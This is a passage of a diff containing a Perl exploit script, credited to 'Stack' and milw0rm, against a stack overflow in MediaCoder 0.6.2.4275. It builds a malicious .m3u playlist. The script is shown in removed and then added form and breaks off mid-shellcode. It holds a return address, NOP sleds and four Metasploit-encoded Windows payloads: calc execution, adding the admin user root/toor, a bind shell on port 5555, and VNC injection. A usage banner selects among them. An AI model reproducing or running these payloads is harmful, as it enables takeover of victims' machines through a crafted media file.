- "\x4e\x30\x4b\x48\x42\x44\x4e\x30\x4b\x48\x42\x47\x4e\x41\x4d\x4a". - "\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b". - "\x42\x50\x42\x50\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x45\x41\x33". - "\x48\x4f\x42\x36\x48\x45\x49\x48\x4a\x4f\x43\x38\x42\x4c\x4b\x47". - "\x42\x55\x4a\x46\x42\x4f\x4c\x38\x46\x50\x4f\x55\x4a\x36\x4a\x39". - "\x50\x4f\x4c\x38\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x36". - "\x4e\x56\x43\x36\x50\x32\x45\x36\x4a\x57\x45\x56\x42\x30\x5a"; - -# win32_adduser - PASS=toor EXITFUNC=seh USER=root Size=489 Encoder=PexAlphaNum http://metasploit.com -my $adduser_shell = - "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". - "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". - "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". - "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". - "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44". - "\x42\x30\x42\x30\x42\x50\x4b\x58\x45\x54\x4e\x43\x4b\x58\x4e\x37". - "\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x31\x4b\x48". - "\x4f\x55\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x38\x46\x43\x4b\x58". - "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c". - "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e". - "\x46\x4f\x4b\x53\x46\x45\x46\x52\x46\x30\x45\x47\x45\x4e\x4b\x58". - "\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x30\x4b\x54". - "\x4b\x58\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38". - "\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x53". - "\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x37". - "\x4e\x30\x4b\x48\x42\x34\x4e\x30\x4b\x58\x42\x47\x4e\x51\x4d\x4a". - "\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". - "\x42\x30\x42\x50\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53". - "\x48\x4f\x42\x46\x48\x55\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". 
- "\x42\x45\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x56\x4a\x49". - "\x50\x4f\x4c\x48\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x36\x4d\x46". - "\x46\x36\x50\x52\x45\x56\x4a\x57\x45\x36\x42\x52\x4f\x42\x43\x56". - "\x42\x42\x50\x56\x45\x36\x46\x37\x42\x52\x45\x37\x43\x47\x45\x46". - "\x44\x57\x42\x52\x44\x57\x4f\x56\x4f\x56\x46\x37\x42\x42\x46\x57". - "\x4f\x46\x4f\x46\x44\x37\x42\x42\x4f\x52\x41\x44\x46\x34\x46\x34". - "\x42\x42\x48\x32\x48\x52\x42\x32\x50\x36\x45\x46\x46\x47\x42\x42". - "\x4e\x56\x4f\x56\x43\x46\x41\x56\x4e\x46\x47\x36\x44\x37\x4f\x56". - "\x45\x47\x42\x57\x42\x42\x41\x44\x46\x36\x4d\x46\x49\x46\x50\x56". - "\x49\x36\x43\x57\x46\x37\x44\x37\x41\x56\x46\x37\x4f\x46\x44\x57". - "\x43\x47\x42\x32\x44\x57\x4f\x56\x4f\x56\x46\x47\x42\x32\x4f\x32". - "\x41\x44\x46\x44\x46\x34\x42\x50\x5a"; - -# win32_bind - EXITFUNC=seh LPORT=5555 Size=709 Encoder=PexAlphaNum http://metasploit.com -my $bind_shell = - "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". - "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". - "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". - "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". - "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e". - "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38". - "\x4e\x46\x46\x42\x46\x32\x4b\x48\x45\x54\x4e\x53\x4b\x58\x4e\x47". - "\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x31\x4b\x58". - "\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x38". - "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c". - "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". - "\x46\x4f\x4b\x43\x46\x45\x46\x52\x4a\x52\x45\x37\x45\x4e\x4b\x48". - "\x4f\x45\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x38\x4e\x50\x4b\x34". - "\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x43\x50\x4e\x32\x4b\x38". - "\x49\x58\x4e\x56\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d". 
- "\x46\x36\x4b\x38\x43\x34\x42\x53\x4b\x58\x42\x34\x4e\x30\x4b\x48". - "\x42\x47\x4e\x51\x4d\x4a\x4b\x58\x42\x54\x4a\x50\x50\x45\x4a\x56". - "\x50\x58\x50\x44\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56". - "\x43\x35\x48\x46\x4a\x46\x43\x43\x44\x53\x4a\x36\x47\x37\x43\x47". - "\x44\x33\x4f\x45\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e". - "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x45\x49\x58\x45\x4e". - "\x48\x46\x41\x38\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x46\x44\x30". - "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45". - "\x4f\x4f\x48\x4d\x43\x55\x43\x35\x43\x45\x43\x55\x43\x55\x43\x34". - "\x43\x45\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x36\x4a\x36\x45\x41". - "\x43\x4b\x48\x36\x43\x45\x49\x38\x41\x4e\x45\x49\x4a\x56\x46\x4a". - "\x4c\x41\x42\x57\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x41". - "\x41\x55\x45\x45\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x52". - "\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d". - "\x4a\x36\x45\x4e\x49\x44\x48\x58\x49\x44\x47\x45\x4f\x4f\x48\x4d". - "\x42\x45\x46\x35\x46\x55\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x46". - "\x47\x4e\x49\x57\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45". - "\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x36\x48\x36\x4a\x56\x43\x36". - "\x4d\x36\x49\x58\x45\x4e\x4c\x56\x42\x55\x49\x35\x49\x52\x4e\x4c". - "\x49\x58\x47\x4e\x4c\x36\x46\x34\x49\x48\x44\x4e\x41\x43\x42\x4c". - "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x54\x4e\x32". - "\x43\x39\x4d\x38\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56". - "\x44\x47\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x34\x4f\x4f". - "\x48\x4d\x4b\x35\x47\x35\x44\x45\x41\x55\x41\x35\x41\x55\x4c\x36". - "\x41\x30\x41\x55\x41\x35\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x46". - "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x46". - "\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x45\x4e\x4f". - "\x43\x38\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d". 
- "\x4a\x56\x42\x4f\x4c\x58\x46\x30\x4f\x55\x43\x35\x4f\x4f\x48\x4d". - "\x4f\x4f\x42\x4d\x5a"; - -# win32_bind_vncinject - VNCDLL=/home/opcode/msfweb/framework/data/vncdll.dll EXITFUNC=seh AUTOVNC=1 VNCPORT=5900 LPORT=4444 Size=649 Encoder=PexAlphaNum http://metasploit.com -my $bind_vncinject = - "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". - "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". - "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". - "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". - "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4a\x4e\x48\x55\x42\x50". - "\x42\x30\x42\x30\x43\x55\x45\x35\x48\x45\x47\x45\x4b\x38\x4e\x36". - "\x46\x42\x4a\x31\x4b\x38\x45\x54\x4e\x33\x4b\x48\x46\x55\x45\x30". - "\x4a\x47\x41\x50\x4c\x4e\x4b\x58\x4c\x54\x4a\x31\x4b\x48\x4c\x55". - "\x42\x42\x41\x50\x4b\x4e\x43\x4e\x44\x43\x49\x54\x4b\x58\x46\x33". - "\x4b\x48\x41\x30\x50\x4e\x41\x33\x4f\x4f\x4e\x4f\x41\x43\x42\x4c". - "\x4e\x4a\x4a\x53\x42\x4e\x46\x57\x47\x30\x41\x4c\x4f\x4c\x4d\x30". - "\x41\x30\x47\x4c\x4b\x4e\x44\x4f\x4b\x33\x4e\x47\x46\x42\x46\x51". - "\x45\x37\x41\x4e\x4b\x38\x4c\x35\x46\x52\x41\x30\x4b\x4e\x48\x56". - "\x4b\x58\x4e\x50\x4b\x54\x4b\x48\x4c\x55\x4e\x51\x41\x30\x4b\x4e". - "\x4b\x58\x46\x30\x4b\x58\x41\x50\x4a\x4e\x4b\x4e\x44\x50\x41\x43". - "\x42\x4c\x4f\x35\x50\x35\x4d\x35\x4b\x45\x44\x4c\x4a\x50\x42\x50". - "\x50\x55\x4c\x36\x42\x33\x49\x55\x46\x46\x4b\x58\x49\x31\x4b\x38". - "\x4b\x45\x4e\x50\x4b\x38\x4b\x35\x4e\x31\x4b\x48\x4b\x51\x4b\x58". - "\x4b\x45\x4a\x30\x43\x55\x4a\x56\x50\x38\x50\x34\x50\x50\x4e\x4e". - "\x4f\x4f\x48\x4d\x49\x48\x47\x4c\x41\x58\x4e\x4e\x42\x50\x41\x50". - "\x42\x50\x42\x30\x47\x45\x48\x55\x43\x45\x49\x38\x45\x4e\x4a\x4e". - "\x47\x52\x42\x30\x42\x30\x42\x30\x42\x59\x41\x50\x42\x30\x42\x50". - "\x48\x4b\x49\x51\x4a\x51\x47\x4e\x46\x4a\x49\x31\x42\x47\x49\x4e". - "\x45\x4e\x49\x54\x48\x58\x49\x54\x46\x4a\x4c\x51\x42\x37\x47\x4c". 
- "\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x49\x4d\x49\x50\x45\x4f\x4d\x4a". - "\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x43\x47\x45\x43\x35\x44\x33\x4f\x45". - "\x43\x33\x44\x43\x42\x30\x4b\x45\x4d\x38\x4b\x34\x42\x42\x41\x55". - "\x4f\x4f\x47\x4d\x49\x58\x4f\x4d\x49\x38\x43\x4c\x4d\x58\x45\x47". - "\x46\x41\x4c\x36\x47\x30\x49\x45\x41\x35\x43\x45\x4f\x4f\x46\x43". - "\x4f\x38\x4f\x4f\x45\x35\x46\x50\x49\x35\x49\x58\x46\x50\x50\x48". - "\x44\x4e\x44\x4f\x4b\x32\x47\x52\x46\x35\x4f\x4f\x47\x43\x4f\x4f". - "\x45\x35\x42\x43\x41\x53\x42\x4c\x42\x45\x42\x35\x42\x35\x42\x55". - "\x42\x54\x42\x55\x42\x44\x42\x35\x4f\x4f\x45\x45\x4e\x32\x49\x48". - "\x47\x4c\x41\x53\x4b\x4d\x43\x45\x43\x45\x4a\x46\x44\x30\x42\x50". - "\x41\x31\x4e\x55\x49\x48\x42\x4e\x4c\x36\x42\x31\x42\x35\x47\x55". - "\x4f\x4f\x45\x35\x46\x32\x43\x55\x47\x45\x4f\x4f\x45\x45\x4a\x32". - "\x43\x55\x46\x35\x47\x45\x4f\x4f\x45\x55\x42\x32\x49\x48\x47\x4c". - "\x41\x58\x4e\x4e\x42\x50\x42\x31\x42\x50\x42\x50\x49\x58\x43\x4e". - "\x4c\x46\x42\x50\x4a\x46\x42\x30\x42\x51\x42\x30\x42\x30\x43\x35". - "\x47\x45\x4f\x4f\x45\x35\x4a\x31\x41\x58\x4e\x4e\x42\x30\x46\x30". 
- "\x42\x30\x42\x30\x4f\x4f\x43\x4d\x5a";
-$id = $ARGV[0];
-if ($id==1){
-print "$header.$junk.$ret.$nop.$calc_shell.$nop";
-exit;
-}
-if ($id==2){
-print "$header.$junk.$ret.$nop.$adduser_shell.$nop";
-exit;
-}
-if ($id==3){
-print "$header.$junk.$ret.$nop.$bind_shell.$nop";
-exit;
-}
-if ($id==4){
-print "$header.$junk.$ret.$nop.$bind_vncinject.$nop";
-exit;
-}
-print "\n";
-print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
-print " +++ +++\n";
-print " +++ +++\n";
-print " +++ MediaCoder 0.6.2.4275 Universal Stack-Based Overflow +++\n";
-print " +++ Written By Stack +++\n";
-print " +++ +++\n";
-print " +++ Usage Ex.: perl $0 1 >>Exploit.m3u +++\n";
-print " +++ +++\n";
-print " +++ Options: +++\n";
-print " +++ 1 - win32_exec calc.exe +++\n";
-print " +++ 2 - win32_adduser Pass=toor User=root +++\n";
-print " +++ 3 - win32_bind Port 5555 +++\n";
-print " +++ 4 - win32_bind_vncinject Port 5900 +++\n";
-print " +++ +++\n";
-print " +++ +++\n";
-print " +++ +++\n";
-print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
-exit;
-#EOF
-
-# milw0rm.com [2009-03-09]
+#!/usr/bin/perl
+# MediaCoder 0.6.2.4275 Universal Stack Based Overflow
+# By Stack
+# Mountassif Moad
+# cat Greatz.txt
+# Jadi-Chel7 & Mr.Safa7 & Houssamix & Simo-Soft & DDos & Simo64 & G0rillaz & Issam & Sec-Alert & & Bohayra & j0rd4n14n.r1z
+# Webug & Travis-Barker & Keyo & General l0s3r & NeoCoderz & welahima b9ite 3arefe chkoune akhore rani tansa :d
+# ahe nsite big thnx to Str0ke and thanks you for all patience and your advice & support
+my $header= "\x23\x45\x58\x54\x4D\x33\x55\x0D\x0A\x23\x45\x58\x54\x49\x4E\x46".
+ "\x3A\x33\x3A\x35\x30\x2C\x4C\x61\x6D\x62\x20\x4F\x66\x20\x47\x6F".
+ "\x64\x20\x2D\x20\x53\x65\x74\x20\x54\x6F\x20\x46\x61\x69\x6C\x20".
+ "\x0D\x0A\x44\x3A\x5C"; + +my $junk = "\x41" x 254; +my $ret = "\x93\x43\x92\x7c"; # Universal return adress :d +my $nop = "\x90" x 25; +# win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com +my $calc_shell = + "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". + "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". + "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". + "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". + "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44". + "\x42\x50\x42\x50\x42\x30\x4b\x48\x45\x34\x4e\x43\x4b\x38\x4e\x47". + "\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48". + "\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x34\x4b\x48\x46\x53\x4b\x48". + "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c". + "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e". + "\x46\x4f\x4b\x53\x46\x55\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x38". + "\x4f\x45\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54". + "\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58". + "\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x30\x43\x4c\x41\x43". + "\x42\x4c\x46\x36\x4b\x58\x42\x34\x42\x33\x45\x48\x42\x4c\x4a\x57". + "\x4e\x30\x4b\x48\x42\x44\x4e\x30\x4b\x48\x42\x47\x4e\x41\x4d\x4a". + "\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b". + "\x42\x50\x42\x50\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x45\x41\x33". + "\x48\x4f\x42\x36\x48\x45\x49\x48\x4a\x4f\x43\x38\x42\x4c\x4b\x47". + "\x42\x55\x4a\x46\x42\x4f\x4c\x38\x46\x50\x4f\x55\x4a\x36\x4a\x39". + "\x50\x4f\x4c\x38\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x36". + "\x4e\x56\x43\x36\x50\x32\x45\x36\x4a\x57\x45\x56\x42\x30\x5a"; + +# win32_adduser - PASS=toor EXITFUNC=seh USER=root Size=489 Encoder=PexAlphaNum http://metasploit.com +my $adduser_shell = + "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". 
+ "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". + "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". + "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". + "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44". + "\x42\x30\x42\x30\x42\x50\x4b\x58\x45\x54\x4e\x43\x4b\x58\x4e\x37". + "\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x31\x4b\x48". + "\x4f\x55\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x38\x46\x43\x4b\x58". + "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c". + "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e". + "\x46\x4f\x4b\x53\x46\x45\x46\x52\x46\x30\x45\x47\x45\x4e\x4b\x58". + "\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x30\x4b\x54". + "\x4b\x58\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38". + "\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x53". + "\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x37". + "\x4e\x30\x4b\x48\x42\x34\x4e\x30\x4b\x58\x42\x47\x4e\x51\x4d\x4a". + "\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". + "\x42\x30\x42\x50\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53". + "\x48\x4f\x42\x46\x48\x55\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". + "\x42\x45\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x56\x4a\x49". + "\x50\x4f\x4c\x48\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x36\x4d\x46". + "\x46\x36\x50\x52\x45\x56\x4a\x57\x45\x36\x42\x52\x4f\x42\x43\x56". + "\x42\x42\x50\x56\x45\x36\x46\x37\x42\x52\x45\x37\x43\x47\x45\x46". + "\x44\x57\x42\x52\x44\x57\x4f\x56\x4f\x56\x46\x37\x42\x42\x46\x57". + "\x4f\x46\x4f\x46\x44\x37\x42\x42\x4f\x52\x41\x44\x46\x34\x46\x34". + "\x42\x42\x48\x32\x48\x52\x42\x32\x50\x36\x45\x46\x46\x47\x42\x42". + "\x4e\x56\x4f\x56\x43\x46\x41\x56\x4e\x46\x47\x36\x44\x37\x4f\x56". + "\x45\x47\x42\x57\x42\x42\x41\x44\x46\x36\x4d\x46\x49\x46\x50\x56". + "\x49\x36\x43\x57\x46\x37\x44\x37\x41\x56\x46\x37\x4f\x46\x44\x57". 
+ "\x43\x47\x42\x32\x44\x57\x4f\x56\x4f\x56\x46\x47\x42\x32\x4f\x32". + "\x41\x44\x46\x44\x46\x34\x42\x50\x5a"; + +# win32_bind - EXITFUNC=seh LPORT=5555 Size=709 Encoder=PexAlphaNum http://metasploit.com +my $bind_shell = + "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". + "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". + "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". + "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". + "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e". + "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38". + "\x4e\x46\x46\x42\x46\x32\x4b\x48\x45\x54\x4e\x53\x4b\x58\x4e\x47". + "\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x31\x4b\x58". + "\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x38". + "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c". + "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". + "\x46\x4f\x4b\x43\x46\x45\x46\x52\x4a\x52\x45\x37\x45\x4e\x4b\x48". + "\x4f\x45\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x38\x4e\x50\x4b\x34". + "\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x43\x50\x4e\x32\x4b\x38". + "\x49\x58\x4e\x56\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d". + "\x46\x36\x4b\x38\x43\x34\x42\x53\x4b\x58\x42\x34\x4e\x30\x4b\x48". + "\x42\x47\x4e\x51\x4d\x4a\x4b\x58\x42\x54\x4a\x50\x50\x45\x4a\x56". + "\x50\x58\x50\x44\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56". + "\x43\x35\x48\x46\x4a\x46\x43\x43\x44\x53\x4a\x36\x47\x37\x43\x47". + "\x44\x33\x4f\x45\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e". + "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x45\x49\x58\x45\x4e". + "\x48\x46\x41\x38\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x46\x44\x30". + "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45". + "\x4f\x4f\x48\x4d\x43\x55\x43\x35\x43\x45\x43\x55\x43\x55\x43\x34". + "\x43\x45\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x36\x4a\x36\x45\x41". 
+ "\x43\x4b\x48\x36\x43\x45\x49\x38\x41\x4e\x45\x49\x4a\x56\x46\x4a". + "\x4c\x41\x42\x57\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x41". + "\x41\x55\x45\x45\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x52". + "\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d". + "\x4a\x36\x45\x4e\x49\x44\x48\x58\x49\x44\x47\x45\x4f\x4f\x48\x4d". + "\x42\x45\x46\x35\x46\x55\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x46". + "\x47\x4e\x49\x57\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45". + "\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x36\x48\x36\x4a\x56\x43\x36". + "\x4d\x36\x49\x58\x45\x4e\x4c\x56\x42\x55\x49\x35\x49\x52\x4e\x4c". + "\x49\x58\x47\x4e\x4c\x36\x46\x34\x49\x48\x44\x4e\x41\x43\x42\x4c". + "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x54\x4e\x32". + "\x43\x39\x4d\x38\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56". + "\x44\x47\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x34\x4f\x4f". + "\x48\x4d\x4b\x35\x47\x35\x44\x45\x41\x55\x41\x35\x41\x55\x4c\x36". + "\x41\x30\x41\x55\x41\x35\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x46". + "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x46". + "\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x45\x4e\x4f". + "\x43\x38\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d". + "\x4a\x56\x42\x4f\x4c\x58\x46\x30\x4f\x55\x43\x35\x4f\x4f\x48\x4d". + "\x4f\x4f\x42\x4d\x5a"; + +# win32_bind_vncinject - VNCDLL=/home/opcode/msfweb/framework/data/vncdll.dll EXITFUNC=seh AUTOVNC=1 VNCPORT=5900 LPORT=4444 Size=649 Encoder=PexAlphaNum http://metasploit.com +my $bind_vncinject = + "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". + "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". + "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". + "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". + "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4a\x4e\x48\x55\x42\x50". + "\x42\x30\x42\x30\x43\x55\x45\x35\x48\x45\x47\x45\x4b\x38\x4e\x36". 
+ "\x46\x42\x4a\x31\x4b\x38\x45\x54\x4e\x33\x4b\x48\x46\x55\x45\x30". + "\x4a\x47\x41\x50\x4c\x4e\x4b\x58\x4c\x54\x4a\x31\x4b\x48\x4c\x55". + "\x42\x42\x41\x50\x4b\x4e\x43\x4e\x44\x43\x49\x54\x4b\x58\x46\x33". + "\x4b\x48\x41\x30\x50\x4e\x41\x33\x4f\x4f\x4e\x4f\x41\x43\x42\x4c". + "\x4e\x4a\x4a\x53\x42\x4e\x46\x57\x47\x30\x41\x4c\x4f\x4c\x4d\x30". + "\x41\x30\x47\x4c\x4b\x4e\x44\x4f\x4b\x33\x4e\x47\x46\x42\x46\x51". + "\x45\x37\x41\x4e\x4b\x38\x4c\x35\x46\x52\x41\x30\x4b\x4e\x48\x56". + "\x4b\x58\x4e\x50\x4b\x54\x4b\x48\x4c\x55\x4e\x51\x41\x30\x4b\x4e". + "\x4b\x58\x46\x30\x4b\x58\x41\x50\x4a\x4e\x4b\x4e\x44\x50\x41\x43". + "\x42\x4c\x4f\x35\x50\x35\x4d\x35\x4b\x45\x44\x4c\x4a\x50\x42\x50". + "\x50\x55\x4c\x36\x42\x33\x49\x55\x46\x46\x4b\x58\x49\x31\x4b\x38". + "\x4b\x45\x4e\x50\x4b\x38\x4b\x35\x4e\x31\x4b\x48\x4b\x51\x4b\x58". + 